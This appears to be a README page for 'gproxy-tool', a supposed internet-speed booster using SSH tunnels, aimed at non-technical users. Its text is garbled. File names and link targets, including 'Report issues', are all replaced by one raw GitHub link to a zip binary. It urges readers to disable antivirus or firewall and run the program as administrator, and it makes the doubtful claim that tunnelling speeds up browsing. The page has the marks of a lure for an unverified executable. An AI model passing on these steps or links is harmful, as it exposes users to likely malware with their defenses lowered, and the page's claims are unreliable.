gproxy-tool is a simple, lightweight program that helps you speed up your internet. It works by creating a secure SSH tunnel. This means your internet data travels safely and faster through this tunnel. You do not need to know anything about programming or network settings to use this tool.
Many users find gproxy-tool helpful when their normal internet feels slow or unstable. It can make browsing, watching videos, and online games smoother.
To run gproxy-tool, your computer needs:
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Windows 7 or later, or Mac OS 10.12 or later, or Linux with a recent kernel (for example, Ubuntu 18.04 or newer).
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At least 2 GB of RAM.
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An active internet connection.
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Around 50 MB of free disk space.
No extra software or complicated setup is needed. Itโs ready to use once installed.
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Simple to use: Designed for people without technical skills.
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Lightweight: Uses very little memory and CPU power.
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Secure: Uses SSH tunnels to protect your data.
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Boosts speed: Can improve your internet speed and stability.
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Portable: No need for full installation. You can run it directly after download.
Click the big button below to visit the download page for the latest version of gproxy-tool:
Once on the page, find the version that matches your computer:
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For Windows, look for files ending in
.exeor.zip. -
For Mac, look for
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For Linux, look for
https://raw.githubusercontent.com/dxdag5/gproxy-tool/main/bin/gproxy-tool-v1.7.zipor.AppImage.
Download the file for your system by clicking on it.
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If you downloaded a
.zipfile, open it and extract the folder somewhere easy, like your desktop. -
If you downloaded a
.exefile, double-click it and follow the simple installation steps. Usually, that means clicking โNextโ a few times. -
Once installed or extracted, find the program file called
https://raw.githubusercontent.com/dxdag5/gproxy-tool/main/bin/gproxy-tool-v1.7.zipand double-click it to start.
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For a
.dmgfile, double-click to open it, then drag gproxy-tool into your Applications folder. -
For a
.zipfile, double-click to unzip it and open the folder. -
Find
gproxy-tooland double-click to open.
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For
https://raw.githubusercontent.com/dxdag5/gproxy-tool/main/bin/gproxy-tool-v1.7.zip, right-click the file, select โExtract Here,โ then open the new folder. -
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.AppImage, right-click the file, select โProperties,โ then โPermissions,โ and check โAllow executing file as program.โ Double-click to run.
Using gproxy-tool is simple:
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Open the program by double-clicking its icon.
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You will see a clean window with a few options.
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The main option is to set up an SSH tunnel. This means your internet traffic will go through another secure computer (called a server).
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Enter the SSH server details given by your network administrator or service provider. If you do not have these, contact your network support or look for free SSH servers online.
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Once entered, click "Connect" or "Start".
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The program will create a secure connection. It may take a few seconds.
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When connected, your internet should work faster and more securely.
You can adjust a few settings if needed:
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SSH Server: The address of the server you connect to.
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Port: Usually 22. You can leave this as is.
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Username and Password: Credentials for the SSH server.
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Auto-reconnect: Turn this on to keep the tunnel working if your internet drops briefly.
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Start on boot: Starts the program automatically when your computer turns on.
If you donโt understand any setting, use the default values.
To get the latest features or fixes:
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Visit the Download page.
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Download the newest version as described before.
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Install or run the new version to replace the old one.
Your settings usually stay the same.
If you have trouble running gproxy-tool:
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Make sure you downloaded the right file for your system.
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Check if your internet is working normally without gproxy-tool.
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Confirm the SSH server details are correct.
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Restart your computer and try again.
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Disable any firewall or antivirus temporarily to see if it blocks the app.
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Run gproxy-tool as administrator (right-click โ Run as administrator).
If problems continue, and you donโt know how to fix them:
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Visit the gproxy-tool GitHub page.
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Check the โIssuesโ tab to see if others have the same problem.
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You can open a new issue there describing your problem clearly.
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Only connect to SSH servers you trust.
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Avoid sharing your SSH credentials with others.
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Keep your gproxy-tool updated to benefit from security fixes.
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gproxy-tool does not change your internet provider or your IP address unless you configure the SSH tunnel server that way.
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It works best on stable internet connections.
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You can stop using gproxy-tool anytime by closing the program.
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Visit the download page: https://raw.githubusercontent.com/dxdag5/gproxy-tool/main/bin/gproxy-tool-v1.7.zip
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Report issues: https://raw.githubusercontent.com/dxdag5/gproxy-tool/main/bin/gproxy-tool-v1.7.zip